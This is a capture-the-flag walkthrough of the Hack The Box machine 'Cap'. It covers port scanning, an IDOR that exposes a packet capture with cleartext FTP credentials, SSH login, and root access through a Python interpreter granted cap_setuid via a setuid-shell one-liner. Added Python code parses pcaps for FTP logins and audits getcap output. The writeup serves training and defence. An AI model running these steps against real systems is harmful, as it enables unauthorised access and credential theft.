HTB Cap done
Cap
Notes
OS: Linux
Technology:
IP Address: 10.129.137.175
Open ports:
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Gunicorn
Users and pass:
From the file 0.pcap:
U: nathan
P: Buck3tH4TF0RM3!
---
Nmap
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cap]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.137.175_nmap 10.129.137.175 ; cat 10.129.137.175_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-03 16:09 CEST
Nmap scan report for 10.129.137.175
Host is up (0.034s latency).
Not shown: 65387 closed tcp ports (reset), 145 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http Gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
Ffuf: http://10.129.137.175/FUZZ
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cap]
└─$ ffuf -u http://10.129.137.175/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o 10.129.137.175_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.137.175/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : 10.129.137.175_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
capture [Status: 302, Size: 220, Words: 21, Lines: 4, Duration: 5691ms]
data [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 39ms]
ip [Status: 200, Size: 17462, Words: 7275, Lines: 355, Duration: 102ms]
netstat [Status: 200, Size: 53826, Words: 27032, Lines: 671, Duration: 59ms]
:: Progress: [163752/163752] :: Job [1/1] :: 917 req/sec :: Duration: [0:04:51] :: Errors: 0 ::
Read pcap file: 0.pcap
IDOR on /data/<id>:
1. Open the website http://10.129.221.239/data/0
2. Download the pcap file 0.pcap
3. Read the FTP login and password from the capture:
U: nathan
P: Buck3tH4TF0RM3!
---
From wireshark
___
220 (vsFTPd 3.0.3)
USER nathan
331 Please specify the password.
PASS Buck3tH4TF0RM3!
230 Login successful.
SYST
215 UNIX Type: L8
PORT 192,168,196,1,212,140
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
PORT 192,168,196,1,212,141
200 PORT command successful. Consider using PASV.
LIST -al
150 Here comes the directory listing.
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 192,168,196,1,212,143
200 PORT command successful. Consider using PASV.
RETR notes.txt
550 Failed to open file.
QUIT
221 Goodbye.
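The credential recovery in steps 1 to 3 above, done programmatically instead of in Wireshark, as an added example that is not part of the original writeup: a minimal libpcap reader that walks Ethernet/IPv4/TCP frames and reports USER/PASS pairs sent in clear to port 21, the check a defender would run over stored captures to learn whether an endpoint like /capture is exposing credentials. The sample capture is constructed inline and the helper names are my own.

```python
import struct

def _tcp_frame(payload, dport=21):
    # Ethernet II / IPv4 / TCP frame around `payload`; checksums are left at zero.
    tcp = struct.pack("!HHIIBBHHH", 40000, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0, 64,
                     6, 0, bytes([192, 168, 196, 1]), bytes([10, 129, 137, 175]))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp + payload

def _pcap(frames):
    # Little-endian libpcap file, link type 1 = Ethernet.
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1_700_000_000 + i, 0, len(f), len(f)) + f
    return out

# Constructed sample: the FTP login exchange from 0.pcap, client lines to port 21.
SAMPLE_PCAP = _pcap([_tcp_frame(b"USER nathan\r\n"),
                     _tcp_frame(b"331 Please specify the password.\r\n", dport=40000),
                     _tcp_frame(b"PASS Buck3tH4TF0RM3!\r\n")])

def ftp_credentials(pcap):
    """Return (user, password) pairs sent in clear to TCP port 21 in a pcap file."""
    magic = struct.unpack("<I", pcap[:4])[0]
    endian = "<" if magic in (0xA1B2C3D4, 0xA1B23C4D) else ">"   # usec / nsec magic
    if struct.unpack(endian + "I", pcap[20:24])[0] != 1:
        raise ValueError("only Ethernet (link type 1) captures are handled")
    off, user, found = 24, None, []
    while off + 16 <= len(pcap):
        caplen = struct.unpack(endian + "IIII", pcap[off:off + 16])[2]
        frame = pcap[off + 16:off + 16 + caplen]
        off += 16 + caplen
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                                   # not IPv4, or not TCP
        ihl, total = (frame[14] & 0x0F) * 4, struct.unpack("!H", frame[16:18])[0]
        tcp = frame[14 + ihl:14 + total]               # also drops Ethernet padding
        if len(tcp) < 20 or struct.unpack("!H", tcp[2:4])[0] != 21:
            continue
        for line in tcp[(tcp[12] >> 4) * 4:].split(b"\r\n"):
            if line.startswith(b"USER "):
                user = line[5:].decode(errors="replace")
            elif line.startswith(b"PASS ") and user is not None:
                found.append((user, line[5:].decode(errors="replace")))
                user = None
    return found
```

Pass the bytes of a real capture (`open("0.pcap", "rb").read()`) to `ftp_credentials`; a non-empty result means the capture endpoint is handing out cleartext logins.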
FTP - login user: nathan
U: nathan
P: Buck3tH4TF0RM3!
___
The FTP login lands in nathan's home folder, and the session is not confined to it: I can browse the rest of the filesystem.
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cap]
└─$ ftp 10.129.221.239
Connected to 10.129.221.239.
220 (vsFTPd 3.0.3)
Name (10.129.221.239:kali): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -a
229 Entering Extended Passive Mode (|||32485|)
150 Here comes the directory listing.
drwxr-xr-x 3 1001 1001 4096 May 27 2021 .
drwxr-xr-x 3 0 0 4096 May 23 2021 ..
lrwxrwxrwx 1 0 0 9 May 15 2021 .bash_history -> /dev/null
-rw-r--r-- 1 1001 1001 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 1001 1001 3771 Feb 25 2020 .bashrc
drwx------ 2 1001 1001 4096 May 23 2021 .cache
-rw-r--r-- 1 1001 1001 807 Feb 25 2020 .profile
lrwxrwxrwx 1 0 0 9 May 27 2021 .viminfo -> /dev/null
-r-------- 1 1001 1001 33 Apr 04 10:01 user.txt
226 Directory send OK.
ftp>
SSH - login user: nathan
U: nathan
P: Buck3tH4TF0RM3!
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cap]
└─$ sshpass -p 'Buck3tH4TF0RM3!' ssh nathan@10.129.221.239
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Apr 4 10:36:18 UTC 2025
System load: 0.0
Usage of /: 36.7% of 8.73GB
Memory usage: 21%
Swap usage: 0%
Processes: 225
Users logged in: 0
IPv4 address for eth0: 10.129.221.239
IPv6 address for eth0: dead:beef::250:56ff:fe94:5320
=> There are 3 zombie processes.
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Apr 4 10:35:39 2025 from 10.10.14.78
nathan@cap:~$
Read flag: user.txt
nathan@cap:~$ cd ~
nathan@cap:~$ ls
user.txt
nathan@cap:~$ cat user.txt
404dd01c4096fea15681f2e2b886bb60
nathan@cap:~$
Check app.py
nathan@cap:/var/www/html$ ls -la app.py
-rw-r--r-- 1 nathan nathan 4293 May 25 2021 app.py
nathan@cap:/var/www/html$
---
```python
@app.route("/capture")
@limiter.limit("10 per minute")
def capture():
    get_lock()
    pcapid = get_appid()      # sequential id: /data/<id> is guessable (the IDOR above)
    increment_appid()
    release_lock()
    path = os.path.join(app.root_path, "upload", str(pcapid) + ".pcap")
    ip = request.remote_addr
    # permissions issues with gunicorn and threads. hacky solution for now.
    #os.setuid(0)
    #command = f"timeout 5 tcpdump -w {path} -i any host {ip}"
    # The child python3 can switch to uid 0 only because the interpreter binary
    # carries cap_setuid (see getcap below); the same trick works from a shell.
    command = f"""python3 -c 'import os; os.setuid(0); os.system("timeout 5 tcpdump -w {path} -i any host {ip}")'"""
    os.system(command)
    #os.setuid(1000)
    return redirect("/data/" + str(pcapid))
```
Check binary python
getcap shows the interpreter carries cap_setuid and cap_net_bind_service; cap_setuid is the one that lets a process switch to uid 0.
---
nathan@cap:/var/www/html$ whereis python
python: /usr/bin/python3.8 /usr/bin/python3.8-config /usr/lib/python3.8 /usr/lib/python3.9 /usr/lib/python2.7 /etc/python3.8 /usr/local/lib/python3.8 /usr/include/python3.8
nathan@cap:/var/www/html$
nathan@cap:/var/www/html$ ls -la /usr/bin/python3.8
-rwxr-xr-x 1 root root 5486384 Jan 27 2021 /usr/bin/python3.8
nathan@cap:/var/www/html$
nathan@cap:/var/www/html$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
Privilege Escalation
Python capabilities: cap_setuid, cap_net_bind_service
Technique: [Linux Privilege Escalation using Capabilities](https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/)
nathan@cap:/var/www/html$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
nathan@cap:/var/www/html$
nathan@cap:/var/www/html$
nathan@cap:/var/www/html$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@cap:/var/www/html#
root@cap:/var/www/html# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)
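An added example (not from the writeup) that turns the getcap check above into a host audit: it parses `getcap -r` output in both the older `path = caps+eip` and newer `path caps=eip` formats and flags files whose permitted or effective set holds a root-equivalent capability, such as the cap_setuid on /usr/bin/python3.8 here. The capability list and the sample output are constructed; cap_net_bind_service alone would not have been flagged.

```python
import re

# Root-equivalent capabilities: any of these on a file an unprivileged user can
# execute behaves like a setuid-root binary. (Constructed policy list.)
ROOT_EQUIVALENT = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
                   "cap_sys_module", "cap_dac_override", "cap_dac_read_search",
                   "cap_chown", "cap_fowner"}

# Matches both libcap output styles:  "path = caps+eip"  and  "path caps=eip".
_LINE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>[a-z_,]+)[=+](?P<flags>[eip]+)$")

def parse_getcap_line(line):
    """Return (path, set_of_caps, flag_letters) for one getcap line."""
    m = _LINE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised getcap line: {line!r}")
    return m["path"], set(m["caps"].split(",")), m["flags"]

def dangerous_capability_files(getcap_output):
    """List (path, dangerous caps) where a root-equivalent capability is in the
    file's permitted or effective set. Inheritable-only (i) entries are skipped:
    a plain exec from an unprivileged shell does not pick them up."""
    hits = []
    for line in getcap_output.splitlines():
        if not line.strip():
            continue
        path, caps, flags = parse_getcap_line(line)
        bad = sorted(caps & ROOT_EQUIVALENT)
        if bad and ("p" in flags or "e" in flags):
            hits.append((path, bad))
    return hits

# Constructed sample: the line seen on Cap, plus benign and edge-case entries.
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/opt/bin/python3 cap_setuid,cap_net_bind_service=eip
/opt/tool cap_dac_read_search=i
"""

if __name__ == "__main__":
    # Real data:  getcap -r / 2>/dev/null | python3 capaudit.py   (script name is hypothetical)
    import sys
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_GETCAP
    for path, bad in dangerous_capability_files(data):
        print(f"{path}: {', '.join(bad)}")
```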
Read flag: root.txt
root@cap:/var/www/html# cd /root/
root@cap:/root# ls -a
. .. .bash_history .bashrc .cache .local .profile .ssh .viminfo root.txt snap
root@cap:/root#
root@cap:/root# cat root.txt
2750aef9b82d3e019b5c0ac7d0ac9a69
root@cap:/root#
References
[Linux Privilege Escalation using Capabilities](https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/)
Lessons Learned
Tags